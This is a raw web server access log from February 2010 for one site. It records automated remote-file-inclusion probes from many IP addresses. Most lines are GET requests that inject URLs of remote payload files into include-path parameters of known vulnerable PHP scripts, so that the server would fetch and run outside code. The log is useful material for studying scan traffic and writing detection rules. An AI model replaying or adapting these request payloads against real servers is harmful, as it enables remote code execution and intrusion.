58.230.162.220 - - [25/Feb/2010:07:46:36 -0800] "GET ///write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:46:36 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:46:36 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:39 -0800] "GET //bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:39 -0800] "GET /logs/access_100203.log%20%20///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:46:39 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [25/Feb/2010:07:47:12 -0800] "GET /logs/access.log/////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:29 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:29 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:29 -0800] "GET /logs/access_100201.log//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:47:30 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:47:30 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:47:31 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:44 -0800] "GET /logs/access_100218.log//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:48 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:49 -0800] "GET /logs/access_100218.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:47:49 -0800] "GET /logs/access_100218.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:47:50 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:00 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:00 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:00 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:17 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:25 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:25 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:29 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:29 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:30 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:48:35 -0800] "GET /logs/access_100129.log//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:40 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:40 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:40 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:48:45 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [25/Feb/2010:07:48:51 -0800] "GET /logs/access_100205.log%20%20///bbs///delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:49:00 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:49:14 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:49:14 -0800] "GET /include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:49:14 -0800] "GET /logs/access_100123.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.74.150.155 - - [25/Feb/2010:07:49:15 -0800] "GET /logs//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [25/Feb/2010:07:49:58 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:50:38 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:50:38 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:50:38 -0800] "GET /logs/access_100201.log//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [25/Feb/2010:07:50:47 -0800] "GET /logs/access_100218.log//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:01 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:01 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:02 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:09 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:09 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:51:09 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.28 - - [25/Feb/2010:07:51:27 -0800] "GET / HTTP/1.0" 200 3626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4)" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:07:52:22 -0800] "GET /logs/access_100202.log//WebKalender//tools/send_reminders.php?noSet=0&includedir=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:07:52:23 -0800] "GET /WebKalender//tools/send_reminders.php?noSet=0&includedir=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
82.179.244.69 - - [25/Feb/2010:07:52:23 -0800] "GET /logs//WebKalender//tools/send_reminders.php?noSet=0&includedir=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:53:00 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:53:00 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:53:00 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:07 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:23 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:23 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:23 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:31 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:31 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:31 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:32 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:32 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:32 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:33 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:33 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:45 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:46 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:54:46 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:54:48 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:54:48 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:54:48 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.72.244 - - [25/Feb/2010:07:55:17 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.72.244 - - [25/Feb/2010:07:55:17 -0800] "GET /orange_g/forum/viewtopic.php?p=28764 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:20 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:21 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:30 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:36 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:42 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:42 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:42 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:44 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:51 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:54 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:54 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:54 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:55:59 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:56:15 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:56:15 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:56:15 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:56:22 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:37 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:37 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:37 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:57:38 -0800] "GET /?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:57:38 -0800] "GET /logs/?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:57:38 -0800] "GET /logs/access_100123.log/?sourcedir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:55 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:56 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:57:56 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:00 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:00 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:00 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:02 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:08 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:08 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:07:58:08 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
